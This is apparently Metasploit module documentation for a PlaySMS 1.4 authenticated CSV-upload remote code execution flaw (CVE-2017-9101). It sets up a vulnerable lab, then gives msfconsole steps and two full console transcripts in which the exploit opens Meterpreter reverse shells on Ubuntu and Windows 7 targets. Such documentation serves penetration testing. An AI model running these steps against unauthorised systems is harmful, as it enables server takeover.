4.2 KiB
4.2 KiB
Description
A malicious file can be uploaded by an authenticated attacker through the import.php (aka the Phonebook import feature) in PlaySMS version 1.4. Additional information and vulnerabilities can be viewed on Exploit-DB 42044 and CVE-2017-9101
Verification Steps
Available at Exploit-DB
Vulnerable Application Installation Setup.
- Download Application :
wget https://www.exploit-db.com/apps/577b6363d3e8baf4696744f911372ea6-playsms-1.4.tar.gz - Extract :
tar -xvf 577b6363d3e8baf4696744f911372ea6-playsms-1.4.tar.gz - Move In WebDirectory :
mv playsms-1.4/web/* /var/www/html/ - make config file:
cp /var/www/html/config-dist.php /var/www/html/config.php - Change Owner :
chown -R www-data:www-data /var/www/html/ - Set DB creds in config.php File. And dump playsms-1.4/db/playsms.sql in your playsms database.
- Now Visit : http://localhost/
Verification Steps
- Install the application
- Start msfconsole
- Do:
use exploit/multi/http/playsms_uploadcsv_exec - Do:
set rport <port> - Do:
set rhost <ip> - Do:
set targeturi SecreTSMSgatwayLogin - Do:
set username touhid - Do:
set password diana - Do:
check
[*] 10.22.1.10:80 The target appears to be vulnerable.
- Do:
set lport <port> - Do:
set lhost <ip> - Do:
exploit - You should get a shell.
Scenarios
Playsms on Ubuntu Linux
msf > use exploit/multi/http/playsms_uploadcsv_exec
msf exploit(multi/http/playsms_uploadcsv_exec) > set rhost 10.22.1.7
rhost => 10.22.1.7
msf exploit(multi/http/playsms_uploadcsv_exec) > set targeturi SecreTSMSgatwayLogin
targeturi => SecreTSMSgatwayLogin
msf exploit(multi/http/playsms_uploadcsv_exec) > check
[*] 10.22.1.7:80 The target appears to be vulnerable.
msf exploit(multi/http/playsms_uploadcsv_exec) > set username touhid
username => touhid
msf exploit(multi/http/playsms_uploadcsv_exec) > set password diana
password => diana
msf exploit(multi/http/playsms_uploadcsv_exec) > set lhost 10.22.1.3
lhost => 10.22.1.3
msf exploit(multi/http/playsms_uploadcsv_exec) > run
[*] Started reverse TCP handler on 10.22.1.3:4444
[+] X-CSRF-Token for login : c9ad6a45cd206228554b237985b344ef
[*] Trying to Login ......
[+] Authentication successful: touhid:diana
[+] X-CSRF-Token for upload : 112cd5ecbdf12daf60391609d19ae3d6
[*] Trying to upload malicious CSV file ....
[*] Sending stage (37543 bytes) to 10.22.1.7
[*] Meterpreter session 2 opened (10.22.1.3:4444 -> 10.22.1.7:56580) at 2018-03-25 17:42:43 +0530
meterpreter > sysinfo
Computer : Dina
OS : Linux Dina 3.2.0-23-generic-pae #36-Ubuntu SMP Tue Apr 10 22:19:09 UTC 2012 i686
Meterpreter : php/linux
meterpreter >
Playsms on Windows 7
msf > use exploit/multi/http/playsms_uploadcsv_exec
msf exploit(multi/http/playsms_uploadcsv_exec) > set rhost 10.22.1.9
rhost => 10.22.1.9
msf exploit(multi/http/playsms_uploadcsv_exec) > set targeturi web
targeturi => web
msf exploit(multi/http/playsms_uploadcsv_exec) > check
[*] 10.22.1.9:80 The target appears to be vulnerable.
msf exploit(multi/http/playsms_uploadcsv_exec) > set username test
username => test
msf exploit(multi/http/playsms_uploadcsv_exec) > set password metasploit
password => metasploit
msf exploit(multi/http/playsms_uploadcsv_exec) > set verbose true
verbose => true
msf exploit(multi/http/playsms_uploadcsv_exec) > exploit
[*] Started reverse TCP handler on 10.22.1.3:4444
[+] X-CSRF-Token for login : cf467bf4829b355a5f4f2964e853ff2c
[*] Trying to Login ......
[+] Authentication successful: test:metasploit
[+] X-CSRF-Token for upload : 3aca00c2d6a5988ed74fa7d992e14904
[*] Trying to upload malicious CSV file ....
[*] Sending stage (37543 bytes) to 10.22.1.9
[*] Meterpreter session 1 opened (10.22.1.3:4444 -> 10.22.1.9:50065) at 2018-03-25 17:27:57 +0530
meterpreter > sysinfo
Computer : TOUHID-PC
OS : Windows NT TOUHID-PC 6.1 build 7600 (Windows 7 Ultimate Edition) i586
Meterpreter : php/windows
meterpreter >